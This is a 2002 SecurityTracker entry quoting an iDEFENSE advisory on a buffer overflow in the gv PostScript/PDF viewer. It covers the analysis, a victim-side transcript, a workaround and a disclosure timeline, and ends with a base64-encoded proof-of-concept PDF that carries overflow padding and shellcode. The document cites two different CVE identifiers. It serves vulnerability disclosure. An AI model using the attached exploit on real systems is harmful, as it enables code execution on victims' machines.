'gv' Postscript and PDF File Viewer Buffer Overflow May Execute Remotely Supplied Code in Malicioius Postscript or PDF Files
|
|
SecurityTracker Alert ID: 1005299
|
|
SecurityTracker URL: http://securitytracker.com/id?1005299
|
|
CVE Reference: CAN-2002-0838
(Links to External Site)
|
Updated: Aug 13 2004
|
Original Entry Date: Sep 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Advisory: iDEFENSE
|
Version(s): 3.5.8
|
Description: A buffer overflow vulnerability was reported in the 'gv' postscript and PDF file viewer. A remote user can create a malicious file that, when viewed by the target user, will cause arbitrary code to be executed.
iDEFENSE reported that there is a buffer oveflow due to an unsafe sscanf() call.
A demonstration exploit is provided in the Source
Message (it is Base64 encoded). A demonstration exploit transcript is also provided:
[root@victim]# ls -al /tmp/itworked
/bin/ls:
/tmp/itworked: No such file or directory
[root@victim]# gv gv-exploit.pdf
[root@victim]# ls -al /tmp/itworked
- -rw-r--r--
1 root root 0 Aug 22 16:50 /tmp/itworked
|
Impact: A remote user can create a malicious file that, when viewed by gv, will cause arbitrary code to be executed by the target user's gv viewer. The code will run with the privileges of the target user.
|
Solution: No solution was available at the time of this entry. iDEFENSE reports that the vendor could not be contacted and the main home page
has not been updated since 1997. iDEFENSE has reportedly coordinated public disclosure with Unix vendors, so it is possible that
patches will be released for various Unix/Linux distributions.
|
Vendor URL: wwwthep.physik.uni-mainz.de/~plass/gv/ (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Linux (Any), UNIX (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Thu, 26 Sep 2002 11:56:18 -0400
Subject: iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflowin gv
|
This is a multi-part message in MIME format.
--------------06DB22E65E101F0B42B8A12F
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
-------- Original Message --------
Subject: iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflowin gv
Date: Thu, 26 Sep 2002 11:46:52 -0400
iDEFENSE Security Advisory 09.26.2002
Exploitable Buffer Overflow in gv
DESCRIPTION
The gv program that is shipped on many Unix systems contains a buffer
overflow which can be exploited by an attacker sending a malformed
postscript or Adobe pdf file. The attacker would be able to cause
arbitrary code to run with the privileges of the victim on his Linux
computer. The gv program is a PDF and postscript viewing program for
Unix which interfaces with the ghostscript interpreter. It is
maintained at http://wwwthep.physik.uni-mainz.de/~plass/gv/ by
Johannes Plass. This particular security vulnerability occurs in the
source code where an unsafe sscanf() call is used to interpret
PostScript and PDF files.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2001-0832 to this issue.
ANALYSIS
In order to perform exploitation, an attacker would have to trick a
user into viewing a malformed PDF or PostScript file from the command
line. This may be somewhat easier for Unix based email programs that
associate gv with email attachments. Since gv is not normally
installed setuid root, an attacker would only be able to cause
arbitrary code to run with the privileges of that user. Other
programs that utilize derivatives of gv, such as ggv or kghostview,
may also be vulnerable in similiar ways.
A proof of concept exploit for Red Hat Linux designed by zen-parse is
attached to this message. It packages the overflow and shellcode in
the "%%PageOrder:" section of the PDF.
[root@victim]# ls -al /tmp/itworked
/bin/ls: /tmp/itworked: No such file or directory
[root@victim]# gv gv-exploit.pdf
[root@victim]# ls -al /tmp/itworked
- -rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked
[root@victim]#
DETECTION
This vulnerability affects the latest version of gv, 3.5.8. An
exploit has been tested on Red Hat Linux 7.3.
WORKAROUND
To avoid potential exploitation, users can select alternatives to gv
such as Kghostview (included with the KDE desktop environment) for
instance. Additionally, the vulnerability does not seem to be
exploitable when a file is opened from the gv interface instead of
the command line.
VENDOR RESPONSE
The author could not be contacted, and the main home page has not
been updated since 1997. Coordinated public disclosure was scheduled
for September 26, 2002 with Unix vendors.
DISCLOSURE TIMELINE
8/23/2002 Disclosed to iDEFENSE
9/6/2002 Disclosed to vendor (plass@thep.physik.uni-mainz.de) by
iDEFENSE
9/6/2002 Disclosed to iDEFENSE clients
9/12/2002 Disclosed to Unix vendors
9/13/2002 Second vendor disclosure attempt
9/26/2002 Public Disclosure
CREDIT
This issue was exclusively disclosed to iDEFENSE by zen-parse
(zen-parse@gmx.net).
To stop receiving iDEFENSE Security Advisories, reply to this message and put
"unsubscribe" in the subject.
--------------06DB22E65E101F0B42B8A12F
Content-Type: application/octet-stream;
name="gv-exploit.pdf"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="gv-exploit.pdf"
JSFQUy1BZG9iZS0zLjANCiUlQ3JlYXRvcjogZ3JvZmYgMS4xNiAod2l0aCBtb2RpZmljYXRpb25z
IGJ5IHplbi1wYXJzZSBieSBoYW5kIDEuMDBhKQ0KJSVDcmVhdGlvbkRhdGU6IFNhdCBKdW4gMTUg
MTU6MzBpc2gNCiUlUGFnZU9yZGVyOiBBQUFBQUFBQUFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFC
Q0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJD
REFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNE
QUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RB
QkNEYWFhYWJiYmJjY2NjZGRkZGVlZWVmZmZmZ2dnZ2hoaGhpaWlpampqamtra2tsbGxsbW1tbW5u
bm5vb29vcHBwcHFxcXFycnJyc3Nzc3R0dHR1dXV1dnZ2dnd3d3eg8v+/QEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAvPz//78xwGgv
L3NoaC9iaW6J41BoLy9zaGgvYmluieFQaC1wcGOJ5lBocmtlZGhpdHdvaHRtcC9oRlN9L2hoJHtJ
aHRvdWOJ4lBSVlFUWVBUWrAhSEhISEhISEhISEhISEhISEhISEhISM2ADQolJUVuZENvbW1lbnRz
DQolJUVPRg0K
--------------06DB22E65E101F0B42B8A12F--
|
|
